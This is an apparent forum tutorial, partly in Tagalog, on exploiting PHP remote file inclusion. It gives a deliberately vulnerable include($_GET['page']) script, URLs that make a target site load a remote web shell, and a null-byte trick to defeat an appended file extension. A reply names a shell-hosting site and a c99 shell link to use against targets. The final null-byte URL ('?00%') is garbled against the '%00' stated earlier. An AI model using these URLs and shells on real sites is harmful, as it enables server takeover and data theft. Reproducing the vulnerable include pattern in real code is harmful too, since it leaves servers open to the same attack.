Remote file inclusion[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass
Remote file inclusion
RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method.
1.RFIExample.
- Code:
-
http://www.site.com/index.php?page=home
2) Vulnerable script - Code:
-
<?php
$page = $_GET['page'];
include($page);
?>
3) Exploiting vulnerabilityWe have site mga tol
- Code:
-
http://www.target-site.com/index.php?page=home
Now instead of home we gonna use our shell.
So we get:
- Code:
-
http://www.target-site.com/index.php?page=www.shell-link.com/shell.txt?
If site is vulnerable it should show shell with list of files from site you are attacking.
4) Null byte bypassIn some scripts there is a weak protection which is gonna include file and add html extension, or some other:
- Code:
-
<?php
$page = $_GET['page'];
include($page.".html");
?>
In that case we are gonna use null byte bypass(%00).
Everything after %00 would not count and use.
So link should look like this:
- Code:
-
http://www.target-site.com/index.php?page=www.shell-link.com/shell.txt?00%
thanks!!
pag nkita nun a vurnerable ang site sa RFI,,,ahmm.
pwede kayung mag hanap ng site na may mga shell..
like c99,at i-47...
pm q sa inio ang site pag active kayu...
here the site of shell
http://www.sh3ll.org/
so u can use
- Code:
-
http://www.sh3ll.org/c99.text?